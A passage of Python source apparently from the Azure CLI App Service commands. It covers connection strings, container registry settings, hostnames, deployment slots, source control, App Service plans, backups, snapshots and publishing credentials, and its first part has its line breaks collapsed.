slot_cfg_names) result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_azure_storage_accounts', azure_storage_accounts, slot, client) return result.properties def _ssl_context(): if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'): try: return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6 except AttributeError: return ssl.SSLContext(ssl.PROTOCOL_TLSv1) return ssl.create_default_context() def _build_app_settings_output(app_settings, slot_cfg_names): slot_cfg_names = slot_cfg_names or [] return [{'name': p, 'value': app_settings[p], 'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)] def update_connection_strings(cmd, resource_group_name, name, 
connection_string_type, settings=None, slot=None, slot_settings=None): from azure.mgmt.web.models import ConnStringValueTypePair if not settings and not slot_settings: raise CLIError('Usage Error: --settings |--slot-settings') settings = settings or [] slot_settings = slot_settings or [] conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot) for name_value in settings + slot_settings: # split at the first '=', connection string should not have '=' in the name conn_string_name, value = name_value.split('=', 1) if value[0] in ["'", '"']: # strip away the quots used as separators value = value[1:-1] conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value, type=connection_string_type) client = web_client_factory(cmd.cli_ctx) result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_connection_strings', conn_strings, slot, client) if slot_settings: new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings] slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or [] slot_cfg_names.connection_string_names += new_slot_setting_names client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) return result.properties def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None): conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot) client = web_client_factory(cmd.cli_ctx) slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) is_slot_settings = False for setting_name in setting_names: conn_strings.properties.pop(setting_name, None) if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names: slot_cfg_names.connection_string_names.remove(setting_name) 
is_slot_settings = True if is_slot_settings: client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_connection_strings', conn_strings, slot, client) CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME', 'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"] APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD'] def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None, docker_custom_image_name=None, docker_registry_server_user=None, websites_enable_app_service_storage=None, docker_registry_server_password=None, multicontainer_config_type=None, multicontainer_config_file=None, slot=None): settings = [] if docker_registry_server_url is not None: settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url) if (not docker_registry_server_user and not docker_registry_server_password and docker_registry_server_url and '.azurecr.io' in docker_registry_server_url): logger.warning('No credential was provided to access Azure Container Registry. 
Trying to look up...') parsed = urlparse(docker_registry_server_url) registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0] try: docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name) except Exception as ex: # pylint: disable=broad-except logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed if docker_registry_server_user is not None: settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user) if docker_registry_server_password is not None: settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password) if websites_enable_app_service_storage: settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage) if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long update_app_settings(cmd, resource_group_name, name, settings, slot) settings = get_app_settings(cmd, resource_group_name, name, slot) if docker_custom_image_name is not None: _add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot) if multicontainer_config_file and multicontainer_config_type: encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file) linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type) update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot) elif multicontainer_config_file or multicontainer_config_type: logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE') return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings, slot=slot)) def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None, 
docker_custom_image_name=None, docker_registry_server_user=None, docker_registry_server_password=None, slot=None): return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url, docker_custom_image_name, docker_registry_server_user, None, docker_registry_server_password, multicontainer_config_type=None, multicontainer_config_file=None, slot=slot) def _get_acr_cred(cli_ctx, registry_name): from azure.mgmt.containerregistry import ContainerRegistryManagementClient from azure.cli.core.commands.parameters import get_resources_in_subscription client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries') result = [item for item in result if item.name.lower() == registry_name] if not result or len(result) > 1: raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name)) resource_group_name = parse_resource_id(result[0].id)['resource_group'] registry = client.get(resource_group_name, registry_name) if registry.admin_user_enabled: # pylint: disable=no-member cred = client.list_credentials(resource_group_name, registry_name) return cred.username, cred.passwords[0].value raise CLIError("Failed to retrieve container registry credentials. 
Please either provide the " "credentials or run 'az acr update -n {} --admin-enabled true' to enable " "admin first.".format(registry_name)) def delete_container_settings(cmd, resource_group_name, name, slot=None): _delete_linux_fx_version(cmd, resource_group_name, name, slot) delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot) def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None): settings = get_app_settings(cmd, resource_group_name, name, slot) return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings, show_multicontainer_config, slot)) def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None): return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot) def _filter_for_container_settings(cmd, resource_group_name, name, settings, show_multicontainer_config=None, slot=None): result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES] fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip() if fx_version: added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME', 'value': fx_version} result.append(added_image_name) if show_multicontainer_config: decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot) decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED', 'value': decoded_value} result.append(decoded_image_name) return result # TODO: remove this when #3660(service tracking issue) is resolved def _mask_creds_related_appsettings(settings): for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]: settings[x] = None return settings def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None): from azure.mgmt.web.models import HostNameBinding client = web_client_factory(cmd.cli_ctx) webapp = client.web_apps.get(resource_group_name, webapp_name) if not webapp: raise 
CLIError("'{}' app doesn't exist".format(webapp_name)) binding = HostNameBinding(site_name=webapp.name) if slot is None: return client.web_apps.create_or_update_host_name_binding(resource_group_name=resource_group_name, name=webapp.name, host_name=hostname, host_name_binding=binding) return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name=resource_group_name, name=webapp.name, host_name=hostname, slot=slot, host_name_binding=binding) def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None): client = web_client_factory(cmd.cli_ctx) if slot is None: return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname) return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname) def list_hostnames(cmd, resource_group_name, webapp_name, slot=None): result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_host_name_bindings', slot)) for r in result: r.name = r.name.split('/')[-1] return result def get_external_ip(cmd, resource_group_name, webapp_name): SslState = cmd.get_models('SslState') # logics here are ported from portal client = web_client_factory(cmd.cli_ctx) webapp = client.web_apps.get(resource_group_name, webapp_name) if not webapp: raise CLIError("'{}' app doesn't exist".format(webapp_name)) if webapp.hosting_environment_profile: address = client.app_service_environments.list_vips( resource_group_name, webapp.hosting_environment_profile.name) if address.internal_ip_address: ip_address = address.internal_ip_address else: vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None) ip_address = vip.virtual_ip if vip else address.service_ip_address else: ip_address = _resolve_hostname_through_dns(webapp.default_host_name) return {'ip': ip_address} def _resolve_hostname_through_dns(hostname): import socket return socket.gethostbyname(hostname) def create_webapp_slot(cmd, 
resource_group_name, webapp, slot, configuration_source=None): Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair') client = web_client_factory(cmd.cli_ctx) site = client.web_apps.get(resource_group_name, webapp) site_config = get_site_configs(cmd, resource_group_name, webapp, None) if not site: raise CLIError("'{}' app doesn't exist".format(webapp)) if 'functionapp' in site.kind: raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp)) location = site.location slot_def = Site(server_farm_id=site.server_farm_id, location=location) slot_def.site_config = SiteConfig() # if it is a Windows Container site, at least pass the necessary # app settings to perform the container image validation: if configuration_source and site_config.windows_fx_version: # get settings from the source clone_from_prod = configuration_source.lower() == webapp.lower() src_slot = None if clone_from_prod else configuration_source app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'list_application_settings', src_slot) settings = [] for k, v in app_settings.properties.items(): if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD", "DOCKER_REGISTRY_SERVER_URL"): settings.append(NameValuePair(name=k, value=v)) slot_def.site_config = SiteConfig(app_settings=settings) poller = client.web_apps.begin_create_or_update_slot(resource_group_name, webapp, site_envelope=slot_def, slot=slot) result = LongRunningOperation(cmd.cli_ctx)(poller) if configuration_source: update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source) result.name = result.name.split('/')[-1] return result def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None): Site = cmd.get_models('Site') client = web_client_factory(cmd.cli_ctx) site = client.web_apps.get(resource_group_name, name) if not site: raise 
CLIError("'{}' function app doesn't exist".format(name)) location = site.location slot_def = Site(server_farm_id=site.server_farm_id, location=location) poller = client.web_apps.begin_create_or_update_slot(resource_group_name, name, site_envelope=slot_def, slot=slot) result = LongRunningOperation(cmd.cli_ctx)(poller) if configuration_source: update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source) result.name = result.name.split('/')[-1] return result def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None): clone_from_prod = configuration_source.lower() == webapp.lower() site_config = get_site_configs(cmd, resource_group_name, webapp, None if clone_from_prod else configuration_source) _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_configuration', slot, site_config) # slot create doesn't clone over the app-settings and connection-strings, so we do it here # also make sure slot settings don't get propagated. 
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp) src_slot = None if clone_from_prod else configuration_source app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'list_application_settings', src_slot) for a in slot_cfg_names.app_setting_names or []: app_settings.properties.pop(a, None) connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'list_connection_strings', src_slot) for a in slot_cfg_names.connection_string_names or []: connection_strings.properties.pop(a, None) _generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_application_settings', app_settings, slot, client) _generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_connection_strings', connection_strings, slot, client) def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals manual_integration=None, git_token=None, slot=None, github_action=None): client = web_client_factory(cmd.cli_ctx) location = _get_location_from_webapp(client, resource_group_name, name) from azure.mgmt.web.models import SiteSourceControl, SourceControl if git_token: sc = SourceControl(location=location, source_control_name='GitHub', token=git_token) client.update_source_control('GitHub', sc) source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch, is_manual_integration=manual_integration, is_mercurial=(repository_type != 'git'), is_git_hub_action=bool(github_action)) # SCC config can fail if previous commands caused SCMSite shutdown, so retry here. 
for i in range(5): try: poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update_source_control', slot, source_control) return LongRunningOperation(cmd.cli_ctx)(poller) except Exception as ex: # pylint: disable=broad-except import re ex = ex_handler_factory(no_throw=True)(ex) # for non server errors(50x), just throw; otherwise retry 4 times if i == 4 or not re.findall(r'\(50\d\)', str(ex)): raise logger.warning('retrying %s/4', i + 1) time.sleep(5) # retry in a moment def update_git_token(cmd, git_token=None): ''' Update source control token cached in Azure app service. If no token is provided, the command will clean up existing token. ''' client = web_client_factory(cmd.cli_ctx) from azure.mgmt.web.models import SourceControl sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '') return client.update_source_control('GitHub', sc) def show_source_control(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot) def delete_source_control(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot) def enable_local_git(cmd, resource_group_name, name, slot=None): client = web_client_factory(cmd.cli_ctx) site_config = get_site_configs(cmd, resource_group_name, name, slot) site_config.scm_type = 'LocalGit' _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update_configuration', slot, site_config) return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)} def sync_site_repo(cmd, resource_group_name, name, slot=None): try: return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot) except CloudError as ex: # Because of bad spec, sdk throws on 200. 
We capture it here if ex.status_code not in [200, 204]: raise ex def list_app_service_plans(cmd, resource_group_name=None): client = web_client_factory(cmd.cli_ctx) if resource_group_name is None: plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites" else: plans = list(client.app_service_plans.list_by_resource_group(resource_group_name)) for plan in plans: # prune a few useless fields del plan.geo_region del plan.subscription return plans def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False, app_service_environment=None, sku='B1', number_of_workers=None, location=None, tags=None, no_wait=False, zone_redundant=False): HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models( 'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan') client = web_client_factory(cmd.cli_ctx) if app_service_environment: if hyper_v: raise ArgumentUsageError('Windows containers is not yet supported in app service environment') ase_list = client.app_service_environments.list() ase_found = False ase = None for ase in ase_list: if ase.name.lower() == app_service_environment.lower() or ase.id.lower() == app_service_environment.lower(): ase_def = HostingEnvironmentProfile(id=ase.id) location = ase.location ase_found = True break if not ase_found: err_msg = "App service environment '{}' not found in subscription.".format(app_service_environment) raise ResourceNotFoundError(err_msg) else: # Non-ASE ase_def = None if location is None: location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name) # the api is odd on parameter naming, have to live with it for now sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers) plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def, reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name, per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def) # TODO use 
# TODO(review): comment truncated at chunk boundary — use the
# zone_redundant field on ASP model when we switch to SDK version 5.0.0
    if zone_redundant:
        plan_def.enable_additional_properties_sending()
        existing_properties = plan_def.serialize()["properties"]
        plan_def.additional_properties["properties"] = existing_properties
        plan_def.additional_properties["properties"]["zoneRedundant"] = True

        # zone-redundant plans need at least 3 instances
        if number_of_workers is None:
            sku_def.capacity = 3
        else:
            sku_def.capacity = max(3, number_of_workers)

    return sdk_no_wait(no_wait, client.app_service_plans.begin_create_or_update, name=name,
                       resource_group_name=resource_group_name, app_service_plan=plan_def)


def update_app_service_plan(instance, sku=None, number_of_workers=None):
    """Mutate an AppServicePlan instance's SKU tier/name and/or worker count and return it.

    Only warns (does not fail) when neither --sku nor --number-of-workers is given.
    """
    if number_of_workers is None and sku is None:
        logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
    sku_def = instance.sku
    if sku is not None:
        sku = _normalize_sku(sku)
        sku_def.tier = get_sku_name(sku)
        sku_def.name = sku

    if number_of_workers is not None:
        sku_def.capacity = number_of_workers
    instance.sku = sku_def
    return instance


def show_plan(cmd, resource_group_name, name):
    """Fetch an App Service plan via a raw ARM GET (returns the raw JSON body)."""
    from azure.cli.core.commands.client_factory import get_subscription_id
    client = web_client_factory(cmd.cli_ctx)
    serverfarm_url_base = 'subscriptions/{}/resourceGroups/{}/providers/Microsoft.Web/serverfarms/{}?api-version={}'
    subscription_id = get_subscription_id(cmd.cli_ctx)
    serverfarm_url = serverfarm_url_base.format(subscription_id, resource_group_name, name,
                                                client.DEFAULT_API_VERSION)
    request_url = cmd.cli_ctx.cloud.endpoints.resource_manager + serverfarm_url
    response = send_raw_request(cmd.cli_ctx, "GET", request_url)
    return response.json()


def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
    """Update a function-app plan; --max-burst is only valid on Elastic Premium plans."""
    instance = update_app_service_plan(instance, sku, number_of_workers)
    if max_burst is not None:
        if not is_plan_elastic_premium(cmd, instance):
            raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
        max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
        instance.maximum_elastic_worker_count = max_burst
    if number_of_workers is not None:
        number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
                                                       number_of_workers, min_val=0, max_val=20)
    return update_app_service_plan(instance, sku, number_of_workers)


def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
    """Return the backup configuration of a webapp (or slot); CLIError when none exists."""
    try:
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                       'get_backup_configuration', slot)
    except Exception:  # pylint: disable=broad-except
        raise CLIError('Backup configuration not found')


def list_backups(cmd, resource_group_name, webapp_name, slot=None):
    """List existing backups of a webapp (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
                                   slot)


def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
                  db_name=None, db_type=None,
                  db_connection_string=None, backup_name=None, slot=None):
    """Trigger an on-demand backup to the given storage container (SAS URL)."""
    BackupRequest = cmd.get_models('BackupRequest')
    client = web_client_factory(cmd.cli_ctx)
    # the service appends '.zip' itself, so strip a user-supplied extension
    if backup_name and backup_name.lower().endswith('.zip'):
        backup_name = backup_name[:-4]
    db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
    backup_request = BackupRequest(backup_name=backup_name,
                                   storage_account_url=storage_account_url, databases=db_setting)
    if slot:
        return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
    return client.web_apps.backup(resource_group_name, webapp_name, backup_request)


def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
                           frequency=None, keep_at_least_one_backup=None,
                           retention_period_in_days=None, db_name=None,
                           db_connection_string=None, db_type=None, backup_name=None, slot=None):
    """Create or update the scheduled-backup configuration.

    Unspecified arguments fall back to the current configuration; if no configuration
    exists yet, the storage URL, frequency, retention and retain-one flags are all required.
    """
    BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
    configuration = None
    if backup_name and backup_name.lower().endswith('.zip'):
        backup_name = backup_name[:-4]
    if not backup_name:
        backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))

    try:
        configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                                'get_backup_configuration', slot)
    except Exception:  # pylint: disable=broad-except
        # No configuration set yet
        if not all([storage_account_url, frequency, retention_period_in_days,
                    keep_at_least_one_backup]):
            raise CLIError('No backup configuration found. A configuration must be created. ' +
                           'Usage: --container-url URL --frequency TIME --retention DAYS ' +
                           '--retain-one TRUE/FALSE')

    # If arguments were not specified, use the values in the current backup schedule
    if storage_account_url is None:
        storage_account_url = configuration.storage_account_url
    if retention_period_in_days is None:
        retention_period_in_days = configuration.backup_schedule.retention_period_in_days
    if keep_at_least_one_backup is None:
        keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
    else:
        keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
    if frequency:
        # Parse schedule frequency
        frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
    else:
        frequency_num = configuration.backup_schedule.frequency_interval
        frequency_unit = configuration.backup_schedule.frequency_unit
    if configuration and configuration.databases:
        # reuse database settings from the existing configuration when not overridden
        db = configuration.databases[0]
        db_type = db_type or db.database_type
        db_name = db_name or db.name
        db_connection_string = db_connection_string or db.connection_string
    db_setting = _create_db_setting(cmd, db_name, db_type=db_type,
                                    db_connection_string=db_connection_string)
    backup_schedule = BackupSchedule(frequency_interval=frequency_num,
                                     frequency_unit=frequency_unit.name,
                                     keep_at_least_one_backup=keep_at_least_one_backup,
                                     retention_period_in_days=retention_period_in_days)
    backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
                                   enabled=True, storage_account_url=storage_account_url,
                                   databases=db_setting)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                   'update_backup_configuration', slot, backup_request)


def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
                   db_name=None, db_type=None, db_connection_string=None,
                   target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
    """Restore a webapp (or slot) from a named backup blob in the given storage container."""
    RestoreRequest = cmd.get_models('RestoreRequest')
    client = web_client_factory(cmd.cli_ctx)
    storage_blob_name = backup_name
    if not storage_blob_name.lower().endswith('.zip'):
        storage_blob_name += '.zip'
    db_setting = _create_db_setting(cmd, db_name, db_type=db_type,
                                    db_connection_string=db_connection_string)
    restore_request = RestoreRequest(storage_account_url=storage_account_url,
                                     blob_name=storage_blob_name, overwrite=overwrite,
                                     site_name=target_name, databases=db_setting,
                                     ignore_conflicting_host_names=ignore_hostname_conflict)
    if slot:
        return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
    return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)


def list_snapshots(cmd, resource_group_name, name, slot=None):
    """List restorable snapshots for a webapp (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
                                   slot)


def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False,  # pylint: disable=redefined-outer-name
                     source_resource_group=None, source_name=None, source_slot=None):
    """Restore an app from a snapshot — either its own, or another app's (both source args required)."""
    from azure.cli.core.commands.client_factory import get_subscription_id
    SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource',
                                                                    'SnapshotRestoreRequest')
    client = web_client_factory(cmd.cli_ctx)
    recover_config = not restore_content_only
    if all([source_resource_group, source_name]):
        # Restore from source app to target app
        sub_id = get_subscription_id(cmd.cli_ctx)
        source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
                    "/providers/Microsoft.Web/sites/" + source_name
        if source_slot:
            source_id = source_id + "/slots/" + source_slot
        source = SnapshotRecoverySource(id=source_id)
        request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
                                         recover_configuration=recover_config)
        if slot:
            return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
        return client.web_apps.restore_snapshot(resource_group_name, name, request)
    if any([source_resource_group, source_name]):
        raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
    # Overwrite app with its own snapshot
    request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time,
                                     recover_configuration=recover_config)
    if slot:
        return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
    return client.web_apps.restore_snapshot(resource_group_name, name, request)


# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
    """Build a one-element DatabaseBackupSetting list; all three args or none must be given.

    Returns None implicitly when no database arguments are supplied.
    """
    DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
    if all([db_name, db_type, db_connection_string]):
        return [DatabaseBackupSetting(database_type=db_type, name=db_name,
                                      connection_string=db_connection_string)]
    if any([db_name, db_type, db_connection_string]):
        raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')


def _parse_frequency(cmd, frequency):
    """Parse a frequency string like '7d' or '12h' into (number, FrequencyUnit)."""
    FrequencyUnit = cmd.get_models('FrequencyUnit')
    unit_part = frequency.lower()[-1]
    if unit_part == 'd':
        frequency_unit = FrequencyUnit.day
    elif unit_part == 'h':
        frequency_unit = FrequencyUnit.hour
    else:
        raise CLIError('Frequency must end with d or h for "day" or "hour"')

    try:
        frequency_num = int(frequency[:-1])
    except ValueError:
        raise CLIError('Frequency must start with a number')

    if frequency_num < 0:
        raise CLIError('Frequency must be positive')

    return frequency_num, frequency_unit


def _get_deleted_apps_locations(cli_ctx):
    """Return the list of locations where the 'deletedSites' resource type is available."""
    client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
    web_provider = client.providers.get('Microsoft.Web')
    del_sites_resource = next((x for x in web_provider.resource_types
                               if x.resource_type == 'deletedSites'), None)
    if del_sites_resource:
        return del_sites_resource.locations
    return []


def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
    """Compose the local-git clone URL (scheme://user@scm-host/app.git) for an app."""
    user = client.get_publishing_user()
    result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
    parsed = urlparse(result.repo_url)
    return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name, parsed.netloc, name)


def _get_scm_url(cmd, resource_group_name, name, slot=None):
    """Return the https Kudu/SCM endpoint of the app by scanning its host name SSL states."""
    from azure.mgmt.web.models import HostType
    app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    for host in app.host_name_ssl_states or []:
        if host.host_type == HostType.repository:
            return "https://{}".format(host.name)

    # this should not happen, but throw anyway
    raise ValueError('Failed to retrieve Scm Uri')


def get_publishing_user(cmd):
    """Return the subscription-level publishing (deployment) user."""
    client = web_client_factory(cmd.cli_ctx)
    return client.get_publishing_user()


def set_deployment_user(cmd, user_name, password=None):
    '''
    Update deployment credentials.(Note, all webapps in your subscription will be impacted)
    '''
    User = cmd.get_models('User')
    client = web_client_factory(cmd.cli_ctx)
    user = User(publishing_user_name=user_name)
    if password is None:
        try:
            # prompt interactively when no password was passed
            password = prompt_pass(msg='Password: ', confirm=True)
        except NoTTYException:
            raise CLIError('Please specify both username and password in non-interactive mode.')

    user.publishing_password = password
    return client.update_publishing_user(user)


def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
    """Return the app's publishing credentials (resolves the LRO before returning)."""
    content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                      'begin_list_publishing_credentials', slot)
    return content.result()


def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
    """Return publish profiles as dicts, or the raw XML string when --xml is requested."""
    import xmltodict
    content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                      'list_publishing_profile_xml_with_secrets', slot,
                                      {"format": "WebDeploy"})
    full_xml = ''
    for f in content:
        full_xml += f.decode()

    if not xml:
        profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
        converted = []

        if not isinstance(profiles, list):
            profiles = [profiles]

        for profile in profiles:
            new = {}
            for key in profile:
                # strip the leading '@' xmltodict put in for attributes
                new[key.lstrip('@')] = profile[key]
            converted.append(new)
        return converted
    # force tsv output so the raw XML is printed unmangled
    cmd.cli_ctx.invocation.data['output'] = 'tsv'
    return full_xml


def enable_cd(cmd, resource_group_name, name, enable, slot=None):
    """Toggle the DOCKER_ENABLE_CI app setting and return the resulting CD URL info."""
    settings = []
    settings.append("DOCKER_ENABLE_CI=" + enable)

    update_app_settings(cmd, resource_group_name, name, settings, slot)

    return show_container_cd_url(cmd, resource_group_name, name, slot)


def show_container_cd_url(cmd, resource_group_name, name, slot=None):
    """Report whether container CI is enabled and, if so, the docker webhook URL."""
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    docker_enabled = False
    for setting in settings:
        if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
            docker_enabled = True
            break

    cd_settings = {}
    cd_settings['DOCKER_ENABLE_CI'] = docker_enabled

    if docker_enabled:
        credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
        if credentials:
            cd_url = credentials.scm_uri + '/docker/hook'
            cd_settings['CI_CD_URL'] = cd_url
    else:
        cd_settings['CI_CD_URL'] = ''

    return cd_settings


def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
    """Open the app's URL in a browser, optionally tailing the streaming log."""
    url = _get_url(cmd, resource_group_name, name, slot)
    open_page_in_browser(url)
    if logs:
        get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)


def _get_url(cmd, resource_group_name, name, slot=None):
    """Return the app's browse URL, preferring https when any host has SSL enabled."""
    SslState = cmd.get_models('SslState')
